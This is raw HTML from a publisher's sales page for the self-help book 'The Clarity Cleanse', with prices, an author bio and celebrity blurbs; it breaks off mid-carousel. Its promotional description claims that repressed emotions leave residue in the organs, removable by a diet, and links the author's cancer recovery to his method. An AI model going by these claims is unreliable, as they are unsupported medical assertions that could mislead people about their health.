					<a class="btn btn-default btn-default title-header__buy-links--button"
					target="_blank"
					href="http://www.target.com/s?searchTerm=9781455542222"
					data-type="link-event"
					data-category="Retailer Button"
					data-action="Click to Retail"
					data-label="Target"
				>
				Target			</a>
					<a class="btn btn-default btn-default title-header__buy-links--button"
					target="_blank"
					href="http://www.walmart.com/search/search-ng.do?q=9781455542222"
					data-type="link-event"
					data-category="Retailer Button"
					data-action="Click to Retail"
					data-label="Walmart"
				>
				Walmart			</a>
			</div>
			</div>

			<div class="title-header__meta-container">
			<div class="title-header__meta">
				<p class="title-header__meta-format title-header__meta-line">Trade Paperback									/ ISBN-13: <span itemprop="isbn">9781455542222</span>
									</p>

				<div class="title-header__meta-group">
					
<div class="title-header__meta-line">
	
		<span itemprop="price" class="title-header__meta-price">
			USD:			<span class="title-header__meta-price-original">
				$16.99			</span>

										<span class="title-header__meta-price-divider">&nbsp;/&nbsp;</span>
					</span>

	
		<span itemprop="price" class="title-header__meta-price">
			CAD:			<span class="title-header__meta-price-original">
				$22.99			</span>

								</span>

	</div>

<div class="row-break"></div>
						<p class="title-header__meta-line title-header__page-count">
							ON SALE: December 31st 2019							<meta itemprop="datePublished" content="2019-12-31" />
						</p>
						
											<p class="title-header__genre">
							<span class="title-header__meta-genre">Genre</span>: <span><a href="https://www.hachettebookgroup.com/genre-category/mind-body-spirit/"><span itemprop="genre">Mind, Body, Spirit</span></a> / <a href="https://www.hachettebookgroup.com/genre/body-mind-spirit/"><span itemprop="genre">Body, Mind &amp; Spirit</span></a> / <a href="https://www.hachettebookgroup.com/genre/body-mind-spirit/inspiration-personal-growth/"><span itemprop="genre">Inspiration &amp; Personal Growth</span></a></span>
						</p>
					
											<div class="row-break"></div>
						<p class="title-header__page-count">PAGE COUNT: <span itemprop="numberOfPages">304</span></p>
										</div>
			</div>
		</div>

		<div class="title-header__formats-container">
			
	<p class="v2-button-cta">Select a format:</p>


	<div class="btn btn-default btn-default title-header__format-button title-header__format-current">
		<a href="#">
			<span>
			Trade Paperback <span class="title-header__dropdown-format format-on-btn__active"></span>		</a>
	</div>

	
			<a href="https://www.hachettebookgroup.com/titles/dr-habib-sadeghi/the-clarity-cleanse/9781455542239/" class="btn btn-default btn-default title-header__format-button  modal-ebook"
				data-toggle="popover"
				title="ebook"
				data-content="
				USD: $11.99 / CAD: $14.99					/ Page Count: 288								">
					ebook				</a>

		
			<a href="https://www.hachettebookgroup.com/titles/dr-habib-sadeghi/the-clarity-cleanse/9781455542246/" class="btn btn-default btn-default title-header__format-button  modal-hardcover"
				data-toggle="popover"
				title="Hardcover"
				data-content="
				USD: $27 / CAD: $35					/ Page Count: 304								">
					Hardcover				</a>

		
			<a href="https://www.hachettebookgroup.com/titles/dr-habib-sadeghi/the-clarity-cleanse/9781478923701/" class="btn btn-default btn-default title-header__format-button  modal-audiobook-downloadable"
				data-toggle="popover"
				title="Audiobook Downloadable"
				data-content="
				Unabridged / USD: $25.98 / CAD: $33.98				">
					Audiobook Downloadable <span class="title-header__dropdown-format format-on-btn">Unabridged</span>				</a>

		
		
			</div>

		
		</div>
	</div>

					<div class="module__content module--fixed">
				<div class="title-header__description-text title-header__full-summary">
					<div><b>A liberating 12-step guide to recognizing the emotional issues that hold us back, with strategies to increase our energy and help us reach our potential by the health and spiritual advisor to Gwyneth Paltrow.</b><br /><br /> Based on the powerful mind-body strategy Dr. Habib Sadegh developed to help himself recover from cancer more than twenty years ago, <i>The Clarity Cleanse</i> will enable you to help your mind clear and your body heal. A regular <i>Goop</i> contributor in health and spirituality, Dr. Sadeghi shows you how to turn obstacles into healing and energizing opportunities.<br /><br />   Because negative emotions actually do damage on the cellular level, <i>The Clarity Cleanse</i>  offers guidance for cleansing both your body and your mind. You will learn how to:<br /><br />  Create a clear intention<br /> Purge negative emotions<br /> Practice compassionate self-forgiveness <br /> Refocus negative energy to move beyond doubt and fear <br /> Ask the kind of questions that will help your relationships. <br /><br /><i>The Clarity Cleanse</i> includes Dr. Sadeghi&#8217;s Intentional Unsaturation Diet, which helps support emotional cleansing by removing the residue of repressed negative emotions. The diet is designed to reduce congestion in the liver, gallbladder, lungs, kidneys, and pancreas-the organs most affected by feelings such as resentment and anger. Dr. Sadeghi&#8217;s friends at Goop have offered eighteen recipes to help make this cleanse delicious.<br /><br />  Following the twelve steps in this book will help you to achieve a sense of peace and control, raise your self-esteem, and assert yourself in new ways to achieve positive and lasting change. Then, finally, you will be able to express your true, authentic self.</div>				</div>
			</div>
		</header>
					<div class="landing-page-module module-newsletter-signup__0 "
					>
			<div class="signup module">
	<div class="module__content">
	<div class="signup__content">
		<p class="newsletter-text">Get recommended reads, deals, and more from Hachette</p>
		<div class="signup__form-wrapper">
			<form class="signup__form">
				<label for="email_address_input" class="screen-reader-text">Get recommended reads, deals, and more from Hachette</label>
				<input id="email_address_input" type="email" name="email_address" class="hachette-input hachette-email" placeholder="Your email address" />
												<button class="newsletter-submit"
					data-type="click-event" data-category="Form Newsletter" data-action="Submit Form" data-label="Submit Newsletter"
				>
					Sign Up				</button>
			</form>
		</div>
	</div>
		<p class="signup__legal">
			By clicking ‘Sign Up,’ I acknowledge that I have read and agree to Hachette Book Group’s 			<a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a>
			 and 			<a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a>
		</p>
	</div>
</div>
		</div>
					<div class="landing-page-module module-meet-the-author__1 "
					>
			
<div class="meet-the-author module module--fixed">
	<div class="module__content meet-the-author__inner module--fixed">
		<div class="meet-the-author__image">
			<a href="https://www.hachettebookgroup.com/contributor/habib-sadeghi-do/">
									<img width="420" height="580" src="" class="lazyload orientation-portrait" alt="" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/06/sadeghi-author-photo1.jpg?resize=420%2C580" />							</a>
		</div>
		<div class="meet-the-author__content">
			<div class="meet-the-author__body">
				<a href="https://www.hachettebookgroup.com/contributor/habib-sadeghi-do/">
					<h2>
						Meet The Author: <span>Habib Sadeghi, DO</span>
					</h2>
				</a>
				<p>
					<div><b>Habib Sadeghi, DO, FACEMIP</b>, is the co-founder of Be Hive of Healing Integrative Medical Center based in Los Angeles and a clinical instructor of family medicine at Western University of Health Sciences. He is the author of <i>Within: A Spiritual Awakening to Love &amp; Weight Loss</i>, as well as the foreword to Gwyneth Paltrow&#8217;s <i>It&#8217;s All Good</i>, and is the publisher of the health and well-being journal, <i>MegaZEN</i>. To learn more about him, you can visit BeingClarity.com.</div>									<div class="contributor-header__share swappable featured-author__share">
					<ul class="site__share">
													<li class="share-facebook">
								<a href="https://www.facebook.com/beingclaritynow" target="_blank"
								   data-type="link-event" data-category="Social Share" data-action="Contributor" data-label="Facebook"
								>
									
<svg viewBox="0 0 155.139 155.139" role="img" aria-labelledby="title-facebook-f-only-icon-2311593021  desc-facebook-f-only-icon-185521042">
	<title id="title-facebook-f-only-icon-2311593021">Facebook Icon</title>
	<desc id="desc-facebook-f-only-icon-185521042">Round FB icon with F initial</desc>
	<g>
		<path role="presentation" d="M89.584,155.139V84.378h23.742l3.562-27.585H89.584V39.184
			c0-7.984,2.208-13.425,13.67-13.425l14.595-0.006V1.08C115.325,0.752,106.661,0,96.577,0C75.52,0,61.104,12.853,61.104,36.452
			v20.341H37.29v27.585h23.814v70.761H89.584z"/>
	</g>
</svg>
								</a>
							</li>
						
													<li class="share-twitter">
								<a href="https://twitter.com/beingclaritynow" target="_blank"
								   data-type="link-event" data-category="Social Share" data-action="Contributor" data-label="Twitter"
								>
									
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 64 51.94" role="img" aria-labelledby="title-alt-twitter-icon-3845382366  desc-alt-twitter-icon-2670261258">
	<title id="title-alt-twitter-icon-3845382366">Twitter Alt Icon</title>
	<desc id="desc-alt-twitter-icon-2670261258">Icon only circular Twitter logo</desc>
	<path role="presentation" class="cls-2" d="M56.57,8.18v0a6.24,6.24,0,0,0,1.44-1A13.13,13.13,0,0,0,62.27,1l-1.63.89a21.28,21.28,0,0,1-6.73,2.27C51.32,1.77,48.62-.09,43.53,0L41.93.2A15.94,15.94,0,0,0,39,1.09,13,13,0,0,0,31.58,9.9a12.2,12.2,0,0,0-.06,6.16,25.08,25.08,0,0,1-5.89-.77,38.64,38.64,0,0,1-16-7.76A24,24,0,0,1,5.67,3.81,8,8,0,0,1,4.49,2.43l-.06,0A15.21,15.21,0,0,0,3,5.82,13.41,13.41,0,0,0,6,17.73c.66.83,1.74,1.34,2.4,2.11h.06a4,4,0,0,1-1.79-.16,14.44,14.44,0,0,1-2.76-.77l-1.35-.64A12.63,12.63,0,0,0,8.71,29.51,9.59,9.59,0,0,0,13,31.24c-.87.73-4.57.4-5.86.26,1.61,4.14,4.08,6.9,8.33,8.4a11.15,11.15,0,0,0,3.91.7,14.6,14.6,0,0,1-3.56,2.33,26.9,26.9,0,0,1-7.88,2.84c-1.19.26-2.46.21-3.75.41A21.44,21.44,0,0,1,0,46l1.15.7a30.83,30.83,0,0,0,3.72,1.92,47.89,47.89,0,0,0,7.72,2.52c5.66,1.4,13.64.77,18.58-.77,13.75-4.29,22.44-14.29,25.72-29a37.62,37.62,0,0,0,.61-8.43l2-1.63A21.21,21.21,0,0,0,64,6.2v0C61.77,6.87,59.42,8.15,56.57,8.18Z" transform="translate(0)"/></svg>
								</a>
							</li>
						
													<li class="share-website">
								<a href="http://behiveofhealing.com" target="_blank"
								   data-type="link-event" data-category="Social Share" data-action="Contributor" data-label="Website"
								>
									
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.8 38.8" role="img" aria-labelledby="title-website-icon-1518735196  desc-website-icon-2436668013">
	<title id="title-website-icon-1518735196">Website Icon</title>
	<desc id="desc-website-icon-2436668013">White globe over gray background</desc>
	<path role="presentation" class="cls-1" d="M19.4,0C8.7,0,0,8.7,0,19.4s8.7,19.4,19.4,19.4c10.7,0,19.4-8.7,19.4-19.4C38.8,8.7,30.1,0,19.4,0C19.4,0,19.4,0,19.4,0z
	 M21.2,34.5C21,34.3,21,34.1,21,33.9v-5.8c-1.2-0.3-2.1-0.9-2.9-1.8S17,24.2,17,23c0-0.4,0-0.8,0.1-1.2H17c-1.6,0-3.1-0.4-4.4-1.2
	s-2.4-1.9-3.2-3.2C8.6,16,8.2,14.6,8.2,13c0-2.7,1-4.8,3.1-6.4s4.8-2.4,8.2-2.5c0.7,0,1.6,0.1,2.6,0.2c0.2,0,0.4,0.1,0.5,0.3
	s0.2,0.3,0.2,0.5c0,2.4-0.5,4.5-1.5,6.3c0.3,0.3,0.6,0.6,0.8,0.8s0.4,0.5,0.5,1s0.3,0.9,0.3,1.4c0,0.4-0.2,0.8-0.5,1.1
	s-0.7,0.5-1.2,0.5c-0.3,0-0.5-0.1-0.7-0.3s-0.4-0.4-0.5-0.5s-0.4-0.4-0.6-0.5c-0.3-0.2-0.6-0.3-1-0.3c-0.6,0-1,0.2-1.4,0.6
	s-0.6,0.9-0.6,1.4c0,0.8,0.4,1.5,1.1,2s1.7,0.8,2.9,0.8h3.2c1.6,0,2.9,0.5,4,1.6s1.6,2.4,1.6,4c0,1.3-0.3,2.6-0.8,3.9
	s-1.2,2.3-1.9,3.1c-0.8,0.8-1.6,1.5-2.4,2s-1.5,0.7-2.2,0.7C21.6,34.7,21.4,34.6,21.2,34.5z" transform="translate(0 0)"/></svg>
								</a>
							</li>
						
													<li class="share-instagram">
								<a href="https://www.instagram.com/beingclaritynow" target="_blank"
								   data-type="link-event" data-category="Social Share" data-action="Contributor" data-label="Instagram"
								>
									
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 38.75" role="img" aria-labelledby="title-ig-icon-2578811598  desc-ig-icon-4168785289">
	<title id="title-ig-icon-2578811598">Instagram Icon</title>
	<desc id="desc-ig-icon-4168785289">Instagram Icon</desc>
	<rect role="presentation" x="23.01" y="11.86" width="3.88" height="3.88" rx="0.97" ry="0.97"/>
	<path role="presentation" d="M25.31,19.37a5.94,5.94,0,1,1-11.66-1.58H11.86v8.12a1,1,0,0,0,1,1H25.92a1,1,0,0,0,1-1V17.79H25.1A5.94,5.94,0,0,1,25.31,19.37Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,23.13a3.76,3.76,0,0,0,3.76-3.76,3.9,3.9,0,0,0,0-.4l0-.11c0-.09,0-.19,0-.28l0-.12c0-.09,0-.17-.07-.26l0-.12-.1-.24,0,0h0a3.75,3.75,0,0,0-6.81,0h0l0,0-.1.24,0,.12c0,.08-.05.17-.07.26l0,.12c0,.09,0,.18,0,.28s0,.07,0,.11a3.83,3.83,0,0,0,0,.4A3.76,3.76,0,0,0,19.37,23.13Z" transform="translate(0 0)"/>
	<path role="presentation" d="M19.37,0A19.37,19.37,0,1,0,38.75,19.37,19.37,19.37,0,0,0,19.37,0Zm9.69,26.64a2.42,2.42,0,0,1-2.42,2.42H12.1a2.42,2.42,0,0,1-2.42-2.42V12.1A2.42,2.42,0,0,1,12.1,9.68H26.64a2.42,2.42,0,0,1,2.42,2.42Z" transform="translate(0 0)"/>
</svg>
								</a>
							</li>
						
						
						
						
						
						
						
											</ul>
				</div>
								<a class="meet-the-author__discover" href="https://www.hachettebookgroup.com/contributor/habib-sadeghi-do/">Discover More</a>
				</p>
			</div>
					</div>
	</div>
</div>
		</div>
					<div class="landing-page-module module-media__2 "
					>
			
<div class="media module module--fixed toggled-tabs" data-module-name="media" data-toggle-view="both">
	<div class="module__content module--fixed toggled-tabs__content">
					<div class="toggled-tabs__item" data-slug="ListentoanExcerpt" data-title="Listen to an Excerpt">
				<div id="ListentoanExcerpt-media-carousel" class="carousel slide" data-desktop-slide-items="2" data-mobile-slide-items="1" data-desktop-slide-rows="1">
					<ol class="carousel-indicators">
													<li data-target="#ListentoanExcerpt-media-carousel" data-slide-to="0"></li>
											</ol>
					<div class="carousel-inner" role="listbox">
						<div class="item carousel__slide">
							<div class="carousel__slide-content">
	<div class="media-carousel__iframe-wrapper media-carousel__iframe-wrapper--audio">
		<div class="media-carousel-iframe" data-src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/363167966&color=%23ff5500&auto_play=false&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true&visual=true"></div>
	</div>
						<p class="media__title">The Clarity Cleanse</p>
			</div>
						</div>
					</div>
					<a class="left carousel-control site-carousel__control--prev" href="#ListentoanExcerpt-media-carousel" role="button" aria-label="Left Arrow" data-slide="prev">
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-left-arrow-1133642006  desc-left-arrow-1191660700">
	<title id="title-left-arrow-1133642006">Left Arrow</title>
	<desc id="desc-left-arrow-1191660700">Left arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
					</a>
					<a class="right carousel-control site-carousel__control--next" href="#ListentoanExcerpt-media-carousel" role="button" aria-label="Right Arrow" data-slide="next">
						
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-right-arrow-267870183  desc-right-arrow-1498992389">
	<title id="title-right-arrow-267870183">Right Arrow</title>
	<desc id="desc-right-arrow-1498992389">Right arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
					</a>
				</div>
			</div>
			</div>
</div>

		</div>
					<div class="landing-page-module module-whats-inside__3 "
					>
			<div
	id="module-whats-inside"
	class="inside module module-whats-inside zola module--fixed module--dark"
	data-isbn="9781455542222"
>
	<div class="module__content module--fixed">
		<h2 class="module-header module-header--default module-header--default-center">
			What&#039;s Inside		</h2>
		<div class="inside__inner">
			<div id="inside__inner-content-1974559153-truncate" class="inside__inner-content" data-load-more-target="whats-inside__read-more" truncateDesktop truncateMobile>
							</div>
		</div>
		<a data-load-more-element="whats-inside__read-more" class="btn btn-default whats-inside__read-more" loadmoreToggle>
			<span class="toggle-text_truncated">
				Read More			</span>
			<span class="toggle-text_expanded">
				Read Less			</span>
		</a>
	</div>
</div>
		</div>
					<div class="landing-page-module module-praise__4 "
					>
			<div id="praise-module" class="praise module module--fixed" data-module-name="praise" data-toggle-view="both">
	<div class="module__content module--fixed praise__inner">
		<h2 class="module-header module-header--default-center">
			Praise		</h2>
		<div>
			<div id="praise__inner-content-232710263-truncate" class="praise__items truncate" data-load-more-target="praise__read-more" truncateDesktop truncateMobile>
				
<div class="praise-item praise-item__description">
	<div class="praise-item__content praise-paragraph toggle-target">
		Dr. Sadeghi simply saved my life. His rigorous honesty and compassion coupled with his tremendous skill makes him the most valuable voice in medicine. He is direct in both his vision and guidance. This book will give you the tools to both simplify and amplify your life for the better. Much like treatment with the man himself, this program will leave you feeling both healed and loved. Oh, and the best part: it's a cleanse with no yucky shakes!—<i><b>Jenni Konner, director, writer, and producer of Girls</b></i>	</div>
</div>

<div class="praise-item praise-item__description">
	<div class="praise-item__content praise-paragraph toggle-target">
		Dr. Sadeghi has helped me understand a path of clarity in my life. He's supported me in bridging the connection between mind and body work. I hope others will find healing in his compassionate teachings.—<i><b>Jessica Chastain, actress</b></i>	</div>
</div>

<div class="praise-item praise-item__description">
	<div class="praise-item__content praise-paragraph toggle-target">
		Trust deeper. These two words, the journey to understanding them, and the man who taught them to me have changed my life. Dr. Sadeghi's THE CLARITY CLEANSE is essential reading for anyone who has felt lost or broken (in other words, for everyone) and wanted to heal into a kinder, stronger, and braver person. I cannot recommend it highly enough.—<i><b>Anne Hathaway, actress</b></i>	</div>
</div>

<div class="praise-item praise-item__description">
	<div class="praise-item__content praise-paragraph toggle-target">
		THE CLARITY CLEANSE-this is a game changer! If you're ready to stop going around in circles you have found your map. THE CLARITY CLEANSE is essential for de-cluttering your emotional and physical body, giving you more conscious control of your life and a taste of what it is to really live healthy, happy, and free!—<i><b>Demi Moore, actress</b></i>	</div>
</div>

<div class="praise-item praise-item__description">
	<div class="praise-item__content praise-paragraph toggle-target">
		Habib Sadeghi offers a new perspective on illness and disease and the pitfalls and obstacles that lie in the path of healing. THE CLARITY CLEANSE is a fresh and innovative approach to what we can do to live healthier and happier lives.—<i><b>Tim Robbins, actor</b></i>	</div>
</div>

<div class="praise-item praise-item__description">
	<div class="praise-item__content praise-paragraph toggle-target">
		THE CLARITY CLEANSE offers a profound path to healing. In it, Dr. Sadeghi clearly shows the false duality of mind and body, that indeed the mind and body are one and our internal worlds are constantly and deeply reflected in our physical body. He leads us with a sense of safety and security, optimism and hope, on the journey from illness and disease to thriving and flourishing.—<i><b>Alane Daugherty, PhD, professor of kinesiology, California State Polytechnic University, Pomona, and co-director, Mind and Heart Research Lab</b></i>	</div>
</div>

<div class="praise-item praise-item__description">
	<div class="praise-item__content praise-paragraph toggle-target">
		In my professional life, I achieved heights beyond my expectations, but in comparison my personal life was empty. No one should settle for empty! In THE CLARITY CLEANSE, Dr. Sadeghi outlined the steps to lead me to my own miracle of finding purpose, growth, and love.—<i><b>Jeanie Buss, owner, Los Angeles Lakers</b></i>	</div>
</div>
			</div>
		</div>
		<a data-load-more-element="praise__read-more" class="btn btn-default praise__read-more" loadmoreToggle>
			<span class="toggle-btn_truncated">
				Read More			</span>
			<span class="toggle-btn_expanded">
				Read Less			</span>
		</a>
	</div>
</div>
		</div>
					<div class="landing-page-module module-tabbed-carousel__5 "
					>
			
<div class="highlights toggled-tabs module" data-module-name="highlights__carousel" data-toggle-view="both">
	<div class="module__content toggled-tabs__content">
			<div class="toggled-tabs__item" data-slug="tab-6268153eb1e49" data-title="Readers Also Loved">
			<div id="tab-6268153eb1e49-carousel" class="carousel slide" data-desktop-slide-items="12" data-mobile-slide-items="1" data-desktop-slide-rows="2">
				<ol class="carousel-indicators banner__carousel-indicators">
											<li data-target="#tab-6268153eb1e49-carousel" data-slide-to="0"></li>
											<li data-target="#tab-6268153eb1e49-carousel" data-slide-to="1"></li>
											<li data-target="#tab-6268153eb1e49-carousel" data-slide-to="2"></li>
											<li data-target="#tab-6268153eb1e49-carousel" data-slide-to="3"></li>
											<li data-target="#tab-6268153eb1e49-carousel" data-slide-to="4"></li>
											<li data-target="#tab-6268153eb1e49-carousel" data-slide-to="5"></li>
									</ol>
				<div class="carousel-inner" role="listbox">
											
							<div class="item carousel__slide">
								<div class="carousel__slide-content">
									<a href="https://www.hachettebookgroup.com/titles/angela-blatteis/the-soup-cleanse/9781455536658/">
										<img width="476" height="720" src="" class="lazyload orientation-portrait" alt="THE SOUP CLEANSE" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2018/01/9781455536658.jpg?fit=476%2C720" />									</a>
								</div>
							</div>

																								
							<div class="item carousel__slide">
								<div class="carousel__slide-content">
									<a href="https://www.hachettebookgroup.com/titles/john-mackey/the-whole-foods-diet/9781478944898/">
										<img width="473" height="720" src="" class="lazyload orientation-portrait" alt="The Whole Foods Diet" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2020/02/9781478944898.jpg?fit=473%2C720" />									</a>
								</div>
							</div>

																								
							<div class="item carousel__slide">
								<div class="carousel__slide-content">
									<a href="https://www.hachettebookgroup.com/titles/gwyneth-paltrow/its-all-easy/9781455584222/">
										<img width="480" height="583" src="" class="lazyload orientation-portrait" alt="It&#039;s All Easy" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/06/9781455584222.jpg?fit=480%2C583" />									</a>
								</div>
							</div>

																								
							<div class="item carousel__slide">
								<div class="carousel__slide-content">
									<a href="https://www.hachettebookgroup.com/titles/gwyneth-paltrow/its-all-good/9781455522705/">
										<img width="480" height="582" src="" class="lazyload orientation-portrait" alt="It&#039;s All Good" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2021/06/9781455522705-2.jpg?fit=480%2C582" />									</a>
								</div>
							</div>

																								
							<div class="item carousel__slide">
								<div class="carousel__slide-content">
									<a href="https://www.hachettebookgroup.com/titles/anthony-youn-md/the-age-fix/9781455533312/">
										<img width="480" height="597" src="" class="lazyload orientation-portrait" alt="The Age Fix" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/06/9781455533312.jpg?fit=480%2C597" />									</a>
								</div>
							</div>

																								
							<div class="item carousel__slide">
								<div class="carousel__slide-content">
									<a href="https://www.hachettebookgroup.com/titles/rip-esselstyn/the-engine-2-cookbook/9781455591190/">
										<img width="480" height="588" src="" class="lazyload orientation-portrait" alt="The Engine 2 Cookbook" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/06/engine2cookbook_hc.jpg?fit=480%2C588" />									</a>
								</div>
							</div>

																						</div>
				<a class="left carousel-control site-carousel__control--prev" href="#Readers Also Loved-carousel" role="button" aria-label="Left Arrow">
					
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-left-arrow-3391369190  desc-left-arrow-2750924850">
	<title id="title-left-arrow-3391369190">Left Arrow</title>
	<desc id="desc-left-arrow-2750924850">Left arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
				</a>
				<a class="right carousel-control site-carousel__control--next" href="#Readers Also Loved-carousel" role="button" aria-label="Right Arrow">
					
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 38.75 22.14" role="img" aria-labelledby="title-right-arrow-744322700  desc-right-arrow-1408724836">
	<title id="title-right-arrow-744322700">Right Arrow</title>
	<desc id="desc-right-arrow-1408724836">Right arrow icon</desc>
	<path role="presentation" d="M38,17.45h0L21.37.85h0a2.76,2.76,0,0,0-2-.85h0a2.76,2.76,0,0,0-2,.85h0L.76,17.45h0a2.77,2.77,0,1,0,4.1,3.72l14.5-14.5L34.06,21.37h0A2.77,2.77,0,0,0,38,17.45Z"/></svg>
				</a>
			</div>
		</div>
		</div>
</div>
		</div>
					<div class="landing-page-module module-related-titles__6 "
					>
			
<div class="contributor-titles module">
	<div class="module__content">
		<div id="titles-carousel-496555-carousel" class="carousel slide" data-desktop-slide-items="6" data-mobile-slide-items="1" data-desktop-slide-rows="1">
							<h2 class="module-header module-header--default-center">
					Related Reads				</h2>
			
			<ol class="carousel-indicators banner__carousel-indicators">
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="0"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="1"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="2"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="3"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="4"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="5"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="6"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="7"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="8"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="9"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="10"></li>
									<li data-target="#titles-carousel-496555-carousel" data-slide-to="11"></li>
							</ol>
			<div class="carousel-inner" role="listbox">
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/jessie-susannah-karnatz-the-money-witch/money-magic/9781797215976/" aria-label="Money Magic">
								<img width="190" height="190" src="" class="lazyload orientation-square" alt="Money Magic" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2022/01/9781797215976.jpg?fit=190%2C190" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/kahlil-gibran/the-prophet/9780762470341/" aria-label="The Prophet">
								<img width="190" height="279" src="" class="lazyload orientation-portrait" alt="The Prophet" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2020/01/9780762470341-1.jpg?fit=190%2C279" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/jolene-hart/ignite-your-light/9780762496167/" aria-label="Ignite Your Light">
								<img width="190" height="249" src="" class="lazyload orientation-portrait" alt="Ignite Your Light" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2019/08/9780762496143_cover_retail.jpg?fit=190%2C249" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/christine-kopaczewski/stone-stacking/9780762469543/" aria-label="Stone Stacking">
								<img width="190" height="127" src="" class="lazyload orientation-landscape" alt="Stone Stacking" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2019/08/9780762469543-1.jpg?fit=190%2C127" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/ezzie-spencer-phd/lunar-abundance-reflective-journal/9780762468508/" aria-label="Lunar Abundance: Reflective Journal">
								<img width="190" height="246" src="" class="lazyload orientation-portrait" alt="Lunar Abundance: Reflective Journal" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2019/04/9780762468508_cover_retail.jpg?fit=190%2C246" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/michael-gustafson/notes-from-a-public-typewriter/9781538729106/" aria-label="Notes from a Public Typewriter">
								<img width="190" height="267" src="" class="lazyload orientation-portrait" alt="Notes from a Public Typewriter" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2018/05/97815387291061.jpg?fit=190%2C267" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/linnea-dunne/lagom/9780762463763/" aria-label="Lagom">
								<img width="190" height="251" src="" class="lazyload orientation-portrait" alt="Lagom" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2018/03/97807624637631.jpg?fit=190%2C251" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/eric-ogrey/walking-with-peety/9781478971146/" aria-label="Walking with Peety">
								<img width="190" height="285" src="" class="lazyload orientation-portrait" alt="Walking with Peety" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2019/11/9781478971146.jpg?fit=190%2C285" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/laurence-shorter/the-lazy-gurus-guide-to-life/9780316348683/" aria-label="The Lazy Guru&#039;s Guide to Life">
								<img width="190" height="245" src="" class="lazyload orientation-portrait" alt="The Lazy Guru&#039;s Guide to Life" loading="lazy" data-src="https://www.hachettebookgroup.com/wp-content/uploads/2017/06/9780316348683.jpg?fit=190%2C245" />							</a>
						</div>
					</div>
									<div class="item carousel__slide">
						<div class="carousel__slide-content">
							<a href="https://www.hachettebookgroup.com/titles/bruce-poon-tip/do-big-small-things/9780762460625/" aria-label="Do Big Small Things">
